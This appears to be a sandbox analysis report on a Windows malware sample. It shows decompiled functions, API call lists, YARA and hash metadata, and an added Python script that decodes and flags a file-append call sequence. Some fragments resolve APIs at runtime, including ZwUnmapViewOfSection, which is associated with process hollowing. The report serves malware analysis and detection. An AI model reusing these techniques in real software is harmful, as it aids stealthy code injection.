                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: GetSystemDirectoryA$kernel32.dll
                                    • API String ID: 2574300362-261809815
                                    • Opcode ID: 197bffbdcfab9a08931bd0fd53a7bf40fe8beca8f618e0b877edb162fd92ae0d
                                    • Instruction ID: f79111351f4f29a60c0ed489d4cadc496980b09f06a717a2ee69e90e3a02e595
                                    • Opcode Fuzzy Hash: 197bffbdcfab9a08931bd0fd53a7bf40fe8beca8f618e0b877edb162fd92ae0d
                                    • Instruction Fuzzy Hash: 6AC09B916416203B772175F69CD4D9F49CCCF754A73000951B51DE7109D5554F9445F0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 58%
                                    			E24016E90(void* __eax, void* __edx) {
                                    				_Unknown_base(*)()* _t3;
                                    				void* _t5;
                                    				void* _t7;
                                    
                                    				_t7 = __edx;
                                    				_t5 = __eax;
                                    				_t3 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GetWindowsDirectoryA");
                                    				return  *_t3(_t5, _t7);
                                    			}

                                    APIs
                                    • LoadLibraryA.KERNEL32(kernel32.dll,GetWindowsDirectoryA,?,?,24016FDE,00000000,2401701F,?,?,?,24017083,?,00000000,240170AB,?,00000000), ref: 24016EA0
                                    • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 24016EA6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: GetWindowsDirectoryA$kernel32.dll
                                    • API String ID: 2574300362-157430550
                                    • Opcode ID: 59df834a10cddf2c29c478307119b66ab06276fc2779e5b1ffebab53116b2117
                                    • Instruction ID: 69e423403ef4282cd4729c24c3e84ac7ba167edddffb2b0f441e944d1634d2f2
                                    • Opcode Fuzzy Hash: 59df834a10cddf2c29c478307119b66ab06276fc2779e5b1ffebab53116b2117
                                    • Instruction Fuzzy Hash: BEC09B91542A203B772176F65CD4D9F45CCCF654AB3000951751CE710D95554F9405F0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 58%
                                    			E24016EDC(void* __eax, void* __edx) {
                                    				_Unknown_base(*)()* _t3;
                                    				void* _t5;
                                    				void* _t7;
                                    
                                    				_t7 = __edx;
                                    				_t5 = __eax;
                                    				_t3 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GetTempPathA");
                                    				return  *_t3(_t5, _t7);
                                    			}

                                    APIs
                                    • LoadLibraryA.KERNEL32(kernel32.dll,GetTempPathA,?,?,2401704D,2405B9C4,24038300,00000000,240384A4,?,?,?,?,00000000,00000000), ref: 24016EEC
                                    • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 24016EF2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: GetTempPathA$kernel32.dll
                                    • API String ID: 2574300362-3269217876
                                    • Opcode ID: 8b31929f9156381729f56c6ad0dbad8b89804d8e2854d8055e5027ff43aebcb1
                                    • Instruction ID: 0a871112e5dd9aca3d2892633fa1dc1232e52f3e44dda2d8d3762dc74d7bcea7
                                    • Opcode Fuzzy Hash: 8b31929f9156381729f56c6ad0dbad8b89804d8e2854d8055e5027ff43aebcb1
                                    • Instruction Fuzzy Hash: 39C022A2202A203B3B2022FA0CC0EAF008CCFAA0EB3000C22B00CE300EC8000F80A0F0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 58%
                                    			E2405493C(void* __eax, void* __edx) {
                                    				_Unknown_base(*)()* _t3;
                                    				void* _t5;
                                    				void* _t7;
                                    
                                    				_t7 = __edx;
                                    				_t5 = __eax;
                                    				_t3 = GetProcAddress(LoadLibraryA("ntdll.dll"), "ZwUnmapViewOfSection");
                                    				return  *_t3(_t5, _t7);
                                    			}


                                    APIs
                                    • LoadLibraryA.KERNEL32(ntdll.dll,ZwUnmapViewOfSection,?,00000000,24054A7E,?,?,?,00000004,?,?,00010002), ref: 2405494C
                                    • GetProcAddress.KERNEL32(00000000,ntdll.dll), ref: 24054952
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: ZwUnmapViewOfSection$ntdll.dll
                                    • API String ID: 2574300362-452462277
                                    • Opcode ID: e6caed4441b83b8dffbebf7ee7281ca08b372e55f43b90c5923dc58739cf91a3
                                    • Instruction ID: 3119d6937e67e5c3c765ca51a2b871a850d8a193896bf884af7ec162b7cbed31
                                    • Opcode Fuzzy Hash: e6caed4441b83b8dffbebf7ee7281ca08b372e55f43b90c5923dc58739cf91a3
                                    • Instruction Fuzzy Hash: D3C09B916516243B7721E7FA1CD5FDF454CDFE50A73010451751CF711995545F8445F0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 58%
                                    			E24015E80(void* __eax) {
                                    				_Unknown_base(*)()* _t3;
                                    				void* _t5;
                                    
                                    				_t5 = __eax;
                                    				_t3 = GetProcAddress(LoadLibraryA("shell32.dll"), "SHFileOperationA");
                                    				return  *_t3(_t5);
                                    			}


                                    APIs
                                    • LoadLibraryA.KERNEL32(shell32.dll,SHFileOperationA), ref: 24015E8D
                                    • GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 24015E93
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: SHFileOperationA$shell32.dll
                                    • API String ID: 2574300362-1445012119
                                    • Opcode ID: 447a24b3402ff76623f1e0fd2d05e5a5d3ef6306e5fc51edb743bd2441ac0ba2
                                    • Instruction ID: 54800464fafc3b15a065d511688907e864eed5678d08cab56e15401a55656e58
                                    • Opcode Fuzzy Hash: 447a24b3402ff76623f1e0fd2d05e5a5d3ef6306e5fc51edb743bd2441ac0ba2
                                    • Instruction Fuzzy Hash: 84B092A09416102E671526F24CD0E1E008D5F640073800400300CEE00989245B840460
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 54%
                                    			E24042750(void* __ebx, void* __edi, void* __esi) {
                                    				intOrPtr _v8;
                                    				char _v12;
                                    				intOrPtr* _t13;
                                    				struct HWND__* _t32;
                                    				intOrPtr _t38;
                                    				struct HWND__* _t48;
                                    				intOrPtr _t51;
                                    
                                    				_push(0);
                                    				_push(0);
                                    				_push(_t51);
                                    				_push(0x24042867);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t51;
                                    				Sleep(0x1f4);
                                    				while( *0x2405aaa4 == 0) {
                                    					_t13 =  *0x2405ab60; // 0x2405ca4c
                                    					if( *((char*)( *_t13 + 0x10)) == 1) {
                                    						__eflags =  *0x240632d4;
                                    						if( *0x240632d4 != 0) {
                                    							__eflags =  *0x2406328c;
                                    							if(__eflags != 0) {
                                    								E2403FA38( *0x24063290,  &_v12, __eflags);
                                    								_push(_v12);
                                    								_push( *0x240632a4);
                                    								_push(0x24042880);
                                    								_push( *0x240632ac);
                                    								_push(0x2404288c);
                                    								_push( *0x240632d4);
                                    								_push(0x2404288c);
                                    								_push(0x2404288c);
                                    								E240133FC();
                                    								E2403FA84( *0x24063290, 0x2406328c, _v8, __eflags);
                                    								E24013088(0x240632d4);
                                    								E2403FC3C( *0x24063290, E2403FC50( *0x24063290));
                                    								E2403F108( *0x2406328c);
                                    								SetWindowPos( *( *0x2406328c + 4), 0xffffffff, 0, 0, 0, 0, 0x13);
                                    								_t32 = GetForegroundWindow();
                                    								_t48 =  *( *0x2406328c + 4);
                                    								__eflags = _t32 - _t48;
                                    								if(_t32 != _t48) {
                                    									SetForegroundWindow(_t48);
                                    								}
                                    							}
                                    						}
                                    						E24038298();
                                    						continue;
                                    					}
                                    					break;
                                    				}
                                    				_pop(_t38);
                                    				 *[fs:eax] = _t38;
                                    				_push(0x2404286e);
                                    				return E240130AC( &_v12, 2);
                                    			}


                                    APIs
                                    • Sleep.KERNEL32(000001F4,00000000,24042867,?,?,?,?,00000000,00000000), ref: 24042777
                                    • SetWindowPos.USER32(?,000000FF,00000000,00000000,00000000,00000000,00000013,2404288C,2404288C,2404288C,24042880,?,000001F4,00000000,24042867), ref: 24042814
                                    • GetForegroundWindow.USER32(?,000000FF,00000000,00000000,00000000,00000000,00000013,2404288C,2404288C,2404288C,24042880,?,000001F4,00000000,24042867), ref: 24042819
                                    • SetForegroundWindow.USER32(?), ref: 24042828
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Window$Foreground$Sleep
                                    • String ID:
                                    • API String ID: 1564942233-0
                                    • Opcode ID: e42c2df37c330b6a537cce6ee8f11ed2d94958caf468d346dcf3183a4a4f598c
                                    • Instruction ID: 04208953aa781ba4e3a2c7b4420c7feabd7af59f5d778525f18bc28e7f8a41ff
                                    • Opcode Fuzzy Hash: e42c2df37c330b6a537cce6ee8f11ed2d94958caf468d346dcf3183a4a4f598c
                                    • Instruction Fuzzy Hash: DC216834B01202AFFB11DB55C890F4DBFA4EB19764F6041B8F901AB29CCBB4A9C4CB95
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 72%
                                    			E2403D15C(void* __eax, void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                                    				intOrPtr _v8;
                                    				void* _v12;
                                    				int _v16;
                                    				int _v20;
                                    				char _v24;
                                    				void* _t56;
                                    				intOrPtr _t65;
                                    				void* _t67;
                                    				char* _t68;
                                    				void* _t73;
                                    				void* _t75;
                                    
                                    				_t75 = __eflags;
                                    				_v24 = 0;
                                    				_t56 = __ecx;
                                    				_v8 = __edx;
                                    				_t67 = __eax;
                                    				_t70 = _a4;
                                    				_push(_t73);
                                    				_push(0x2403d228);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t73 + 0xffffffec;
                                    				RegOpenKeyExA(_t67, E24013534(_v8), 0, 1,  &_v12);
                                    				_v16 = 0;
                                    				_t68 = E24013534(_t56);
                                    				RegQueryValueExA(_v12, _t68, 0,  &_v16, 0,  &_v20);
                                    				E24013174( &_v24, _v20, 0, _t75);
                                    				RegQueryValueExA(_v12, _t68, 0,  &_v16, E24013534(_v24),  &_v20);
                                    				E24013274(_a4, E24013534(_v24));
                                    				RegCloseKey(_v12);
                                    				E24013274(_t70, E24013534(_v24));
                                    				_pop(_t65);
                                    				 *[fs:eax] = _t65;
                                    				_push(0x2403d22f);
                                    				return E24013088( &_v24);
                                    			}


                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(?,00000000,00000000,00000001,?,00000000,2403D228), ref: 2403D194
                                    • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,?,00000000,00000000,00000001,?,00000000,2403D228), ref: 2403D1B8
                                    • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,?,00000000,00000000,?,00000000,?,?,00000000,00000000,00000001), ref: 2403D1E2
                                    • RegCloseKey.ADVAPI32(?,?,00000000,00000000,?,00000000,?,?,00000000,00000000,?,00000000,?,?,00000000,00000000), ref: 2403D1FC
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: QueryValue$CloseOpen
                                    • String ID:
                                    • API String ID: 1586453840-0
                                    • Opcode ID: 2335294db028b5f2f38bfc0fd452b5abab27d5df04ec84b0eb78c111557e705a
                                    • Instruction ID: 979a03369db9fc66bd0eb84d1f3c609785e04e46149c97d7ff5c563cf495da0b
                                    • Opcode Fuzzy Hash: 2335294db028b5f2f38bfc0fd452b5abab27d5df04ec84b0eb78c111557e705a
                                    • Instruction Fuzzy Hash: BE21E7B5A00148AFFF00EBA9DD81EAFBBFCEF68644F504465B508F7254DA749E408B61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E2402435C(void** _a4) {
                                    				signed int _v8;
                                    				char _v12;
                                    				void* _t25;
                                    				void* _t28;
                                    				struct HINSTANCE__* _t36;
                                    				void* _t39;
                                    				void* _t45;
                                    				void** _t47;
                                    				signed int _t54;
                                    
                                    				_t47 = _a4;
                                    				_t39 =  *_t47;
                                    				if(_t39 != 0 &&  *((char*)(_t39 + 0x10)) != 0) {
                                    					_t45 =  *(_t39 + 4);
                                    					 *((intOrPtr*)( *((intOrPtr*)( *_t39 + 0x28)) + _t45))(_t45, 0, 0);
                                    					 *((char*)(_t39 + 0x10)) = 0;
                                    					_t25 =  *((intOrPtr*)(_t39 + 0xc)) - 1;
                                    					if(_t25 >= 0) {
                                    						_v12 = _t25 + 1;
                                    						_v8 = 0;
                                    						do {
                                    							_t54 = _v8 << 2;
                                    							 *((intOrPtr*)(_t39 + 8)) =  *((intOrPtr*)(_t39 + 8)) + _t54;
                                    							_t36 =  *( *( *_t47 + 8));
                                    							if(_t36 != 0xffffffff) {
                                    								FreeLibrary(_t36);
                                    							}
                                    							 *((intOrPtr*)(_t39 + 8)) =  *((intOrPtr*)(_t39 + 8)) - _t54;
                                    							_v8 = _v8 + 1;
                                    							_t17 =  &_v12;
                                    							 *_t17 = _v12 - 1;
                                    						} while ( *_t17 != 0);
                                    					}
                                    					E24014B28( *((intOrPtr*)(_t39 + 8)));
                                    					_t28 =  *(_t39 + 4);
                                    					if(_t28 != 0) {
                                    						VirtualFree(_t28, 0, 0x8000);
                                    					}
                                    					HeapFree(GetProcessHeap(), 0,  *_t47);
                                    					 *_t47 = 0;
                                    				}
                                    				return 0;
                                    			}


                                    APIs
                                    • FreeLibrary.KERNEL32(?), ref: 240243BC
                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 240243E5
                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 240243EF
                                    • HeapFree.KERNEL32(00000000,00000000,?), ref: 240243F5
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Free$Heap$LibraryProcessVirtual
                                    • String ID:
                                    • API String ID: 548792435-0
                                    • Opcode ID: 327151f7bebc56f7355ee985beca54bda8cd7dd0ae24fdd1ad7be8b3eac1ed1b
                                    • Instruction ID: f97f3103f5dbf574c2b392118eac2456a7830a3e3d6531ac7e242cdaadc44754
                                    • Opcode Fuzzy Hash: 327151f7bebc56f7355ee985beca54bda8cd7dd0ae24fdd1ad7be8b3eac1ed1b
                                    • Instruction Fuzzy Hash: 42114F71A04615AFEB10DFA8C8C0B0AB7E8EF54724F244195E91CEF2D5D770E994CBA4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 93%
                                    			E24041684(intOrPtr _a4, short _a6, intOrPtr _a8) {
                                    				struct _WNDCLASSA _v44;
                                    				struct HINSTANCE__* _t6;
                                    				CHAR* _t8;
                                    				struct HINSTANCE__* _t9;
                                    				int _t10;
                                    				void* _t11;
                                    				struct HINSTANCE__* _t13;
                                    				struct HINSTANCE__* _t19;
                                    				CHAR* _t20;
                                    				struct HWND__* _t22;
                                    				CHAR* _t24;
                                    
                                    				_t6 =  *0x2405b67c; // 0x24010000
                                    				 *0x2405aa6c = _t6;
                                    				_t8 =  *0x2405aa80; // 0x240415a0
                                    				_t9 =  *0x2405b67c; // 0x24010000
                                    				_t10 = GetClassInfoA(_t9, _t8,  &_v44);
                                    				asm("sbb eax, eax");
                                    				_t11 = _t10 + 1;
                                    				if(_t11 == 0 || L24015258 != _v44.lpfnWndProc) {
                                    					if(_t11 != 0) {
                                    						_t19 =  *0x2405b67c; // 0x24010000
                                    						_t20 =  *0x2405aa80; // 0x240415a0
                                    						UnregisterClassA(_t20, _t19);
                                    					}
                                    					RegisterClassA(0x2405aa5c);
                                    				}
                                    				_t13 =  *0x2405b67c; // 0x24010000
                                    				_t24 =  *0x2405aa80; // 0x240415a0
                                    				_t22 = E240154D4(0x80, _t24, 0, _t13, 0, 0, 0, 0, 0, 0, 0x80000000);
                                    				if(_a6 != 0) {
                                    					SetWindowLongA(_t22, 0xfffffffc, E240415D8(_a4, _a8));
                                    				}
                                    				return _t22;
                                    			}


                                    APIs
                                    • GetClassInfoA.USER32(24010000,240415A0,?), ref: 240416A5
                                    • UnregisterClassA.USER32(240415A0,24010000), ref: 240416CE
                                    • RegisterClassA.USER32(2405AA5C), ref: 240416D8
                                    • SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 24041723
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Class$InfoLongRegisterUnregisterWindow
                                    • String ID:
                                    • API String ID: 4025006896-0
                                    • Opcode ID: 058516e327051851eaa92d68fbdbc3567e5a5302a41ef786f86185bc7bd79c04
                                    • Instruction ID: 5d6d12c1c5f1638e54d88e172aeff26ace834c3fa088445d8c6e8abfa3585253
                                    • Opcode Fuzzy Hash: 058516e327051851eaa92d68fbdbc3567e5a5302a41ef786f86185bc7bd79c04
                                    • Instruction Fuzzy Hash: C00152B1A44104ABEB41DFA9CC84E9A77ACF718109F108230F919FF284DA79DDC48B50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 93%
                                    			E24053B80(intOrPtr _a4, short _a6, intOrPtr _a8) {
                                    				struct _WNDCLASSA _v44;
                                    				struct HINSTANCE__* _t6;
                                    				CHAR* _t8;
                                    				struct HINSTANCE__* _t9;
                                    				int _t10;
                                    				void* _t11;
                                    				struct HINSTANCE__* _t13;
                                    				struct HINSTANCE__* _t19;
                                    				CHAR* _t20;
                                    				struct HWND__* _t22;
                                    				CHAR* _t24;
                                    
                                    				_t6 =  *0x2405b67c; // 0x24010000
                                    				 *0x2405aad4 = _t6;
                                    				_t8 =  *0x2405aae8; // 0x24053ab0
                                    				_t9 =  *0x2405b67c; // 0x24010000
                                    				_t10 = GetClassInfoA(_t9, _t8,  &_v44);
                                    				asm("sbb eax, eax");
                                    				_t11 = _t10 + 1;
                                    				if(_t11 == 0 || L24015258 != _v44.lpfnWndProc) {
                                    					if(_t11 != 0) {
                                    						_t19 =  *0x2405b67c; // 0x24010000
                                    						_t20 =  *0x2405aae8; // 0x24053ab0
                                    						UnregisterClassA(_t20, _t19);
                                    					}
                                    					RegisterClassA(0x2405aac4);
                                    				}
                                    				_t13 =  *0x2405b67c; // 0x24010000
                                    				_t24 =  *0x2405aae8; // 0x24053ab0
                                    				_t22 = E240154D4(0x80, _t24, 0, _t13, 0, 0, 0, 0, 0, 0, 0x80000000);
                                    				if(_a6 != 0) {
                                    					SetWindowLongA(_t22, 0xfffffffc, E24053AE8(_a4, _a8));
                                    				}
                                    				return _t22;
                                    			}

                                    0x24053b87
                                    0x24053b8c
                                    0x24053b95
                                    0x24053b9b
                                    0x24053ba1
                                    0x24053ba9
                                    0x24053bab
                                    0x24053bae
                                    0x24053bbc
                                    0x24053bbe
                                    0x24053bc4
                                    0x24053bca
                                    0x24053bca
                                    0x24053bd4
                                    0x24053bd4
                                    0x24053bea
                                    0x24053bf7
                                    0x24053c07
                                    0x24053c0e
                                    0x24053c1f
                                    0x24053c1f
                                    0x24053c2a

                                    APIs
                                    • GetClassInfoA.USER32(24010000,24053AB0,?), ref: 24053BA1
                                    • UnregisterClassA.USER32(24053AB0,24010000), ref: 24053BCA
                                    • RegisterClassA.USER32(2405AAC4), ref: 24053BD4
                                    • SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 24053C1F
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Class$InfoLongRegisterUnregisterWindow
                                    • String ID:
                                    • API String ID: 4025006896-0
                                    • Opcode ID: 722f483689c92c6ae43707a2b06e8fc22369b5ad556702ef704db49b336cde16
                                    • Instruction ID: 96c510306755618a1fd3a9f6c96d9ab3ab95adeedde68d798eea49e8bbd1af27
                                    • Opcode Fuzzy Hash: 722f483689c92c6ae43707a2b06e8fc22369b5ad556702ef704db49b336cde16
                                    • Instruction Fuzzy Hash: A30148B1604204ABEB00DF6CCD90F9E77ADF71D119F508621F618EB294DA79D8D58750
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 65%
                                    			E2405219C(intOrPtr __eax, void* __ebx, long __ecx, char __edx, void* __esi, void* __eflags) {
                                    				intOrPtr _v8;
                                    				char _v12;
                                    				long _v16;
                                    				void* _t28;
                                    				intOrPtr _t33;
                                    				long _t36;
                                    				void* _t39;
                                    
                                    				_t36 = __ecx;
                                    				_v12 = __edx;
                                    				_v8 = __eax;
                                    				E24013524(_v8);
                                    				E24013524(_v12);
                                    				_push(_t39);
                                    				_push(0x24052231);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t39 + 0xfffffff4;
                                    				// CreateFileA(name, GENERIC_WRITE (0x40000000), FILE_SHARE_WRITE (2), NULL, OPEN_EXISTING (3), 0, NULL):
                                    				// the target file must already exist; nothing is created here.
                                    				_t28 = CreateFileA(E24013534(_v8), 0x40000000, 2, 0, 3, 0, 0);
                                    				if(_t28 != 0xffffffff) { // INVALID_HANDLE_VALUE
                                    					SetFilePointer(_t28, 0, 0, 2); // FILE_END (2): seek to the end, so the write below is an append
                                    					WriteFile(_t28, E24013588( &_v12), _t36,  &_v16, 0); // _t36 = byte count passed in __ecx
                                    					CloseHandle(_t28);
                                    				}
                                    				_pop(_t33);
                                    				 *[fs:eax] = _t33;
                                    				_push(E24052238);
                                    				return E240130AC( &_v12, 2);
                                    			}

                                    0x240521a4
                                    0x240521a6
                                    0x240521a9
                                    0x240521af
                                    0x240521b7
                                    0x240521be
                                    0x240521bf
                                    0x240521c4
                                    0x240521c7
                                    0x240521e7
                                    0x240521ec
                                    0x240521f5
                                    0x2405220b
                                    0x24052211
                                    0x24052211
                                    0x24052218
                                    0x2405221b
                                    0x2405221e
                                    0x24052230

                                    APIs
                                    • CreateFileA.KERNEL32(00000000,40000000,00000002,00000000,00000003,00000000,00000000,00000000,24052231,?,2406330C,00000000), ref: 240521E2
                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00000000,40000000,00000002,00000000,00000003,00000000,00000000,00000000,24052231,?,2406330C,00000000), ref: 240521F5
                                    • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000002,00000000,40000000,00000002,00000000,00000003,00000000,00000000), ref: 2405220B
                                    • CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000002,00000000,40000000,00000002,00000000,00000003,00000000), ref: 24052211
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: File$CloseCreateHandlePointerWrite
                                    • String ID:
                                    • API String ID: 3604237281-0
                                    • Opcode ID: 6376c2b48263b4c1bcd54d62db4f0b960adfb34c8463ff23cffeebe42344fecb
                                    • Instruction ID: 5ed0753c6fea422317e33076f06a6fa9ab87e84fcccc2cc94ce371dbbe804708
                                    • Opcode Fuzzy Hash: 6376c2b48263b4c1bcd54d62db4f0b960adfb34c8463ff23cffeebe42344fecb
                                    • Instruction Fuzzy Hash: 8A01D8B0640304BBFB10D774DC92F5EBAECEF58B18F600565B508FB1D5D6B46E808914
                                    Uniqueness

                                    Uniqueness Score: -1.00%
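The four calls listed for E2405219C are its entire I/O: open an existing file for writing, seek to its end, write a buffer, close. The Python below is an added illustration, not output of the sandbox and not code from the sample: it parses the bullet lines exactly as they appear in this report, decodes the CreateFileA and SetFilePointer arguments symbolically, and flags that append-to-existing-file sequence. The embedded lines are copied from the list above; the argument positions follow the Win32 prototypes, and the classification rule is the editor's own.

```python
"""Decode the Win32 calls listed for E2405219C and flag the append-to-existing-file pattern."""
import re

# One API line of the report: "• Name.MODULE(arg,arg,...), ref: ADDR"
API_LINE = re.compile(
    r"^\s*•?\s*(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Copied from the report's API list for E2405219C. The sandbox dumps more stack slots than the
# API takes, so only the leading arguments of each call are meaningful; '?' is an unresolved slot.
REPORT_LINES = """\
• CreateFileA.KERNEL32(00000000,40000000,00000002,00000000,00000003,00000000,00000000,00000000,24052231,?,2406330C,00000000), ref: 240521E2
• SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00000000,40000000,00000002,00000000,00000003,00000000,00000000,00000000,24052231,?,2406330C,00000000), ref: 240521F5
• WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000002,00000000,40000000,00000002,00000000,00000003,00000000,00000000), ref: 2405220B
• CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000002,00000000,40000000,00000002,00000000,00000003,00000000), ref: 24052211
"""

GENERIC_ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
                  0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
SHARE_MODE = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
CREATION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
            4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
MOVE_METHOD = {0: "FILE_BEGIN", 1: "FILE_CURRENT", 2: "FILE_END"}


def parse_api_lines(text):
    """Turn the report's bullet lines into dicts; an unresolved '?' argument becomes None."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        args = [None if a.strip() == "?" else int(a, 16) for a in m["args"].split(",")]
        calls.append({"api": m["api"], "module": m["module"], "args": args, "ref": int(m["ref"], 16)})
    return calls


def flag_names(value, table):
    """Expand a bitmask into its symbolic names ('0' when no listed bit is set)."""
    names = [name for bit, name in table.items() if value & bit]
    return "|".join(names) if names else "0"


def describe_create_file(args):
    """CreateFileA(lpFileName, dwDesiredAccess, dwShareMode, lpSecurityAttributes,
    dwCreationDisposition, dwFlagsAndAttributes, hTemplateFile): decode the three that matter."""
    return {"access": flag_names(args[1], GENERIC_ACCESS),
            "share": flag_names(args[2], SHARE_MODE),
            "creation": CREATION.get(args[4], hex(args[4]))}


def is_append_to_existing_file(calls):
    """True when the sequence is CreateFileA(GENERIC_WRITE, OPEN_EXISTING), then
    SetFilePointer(..., FILE_END), then WriteFile, then CloseHandle: an append to a file
    that must already exist, which is what E2405219C does."""
    order = [c["api"] for c in calls]
    try:
        i = order.index("CreateFileA")
        j = order.index("SetFilePointer", i)
        k = order.index("WriteFile", j)
        order.index("CloseHandle", k)
    except ValueError:
        return False
    create, seek = calls[i]["args"], calls[j]["args"]
    # SetFilePointer(hFile, lDistanceToMove, lpDistanceToMoveHigh, dwMoveMethod)
    return (bool(create[1] & 0x40000000) and create[4] == 3
            and MOVE_METHOD.get(seek[3]) == "FILE_END")


if __name__ == "__main__":
    parsed = parse_api_lines(REPORT_LINES)
    for c in parsed:
        print(f"{c['ref']:08X} {c['api']}.{c['module']}")
    print(describe_create_file(parsed[0]["args"]))
    print("append-to-existing-file:", is_append_to_existing_file(parsed))
```

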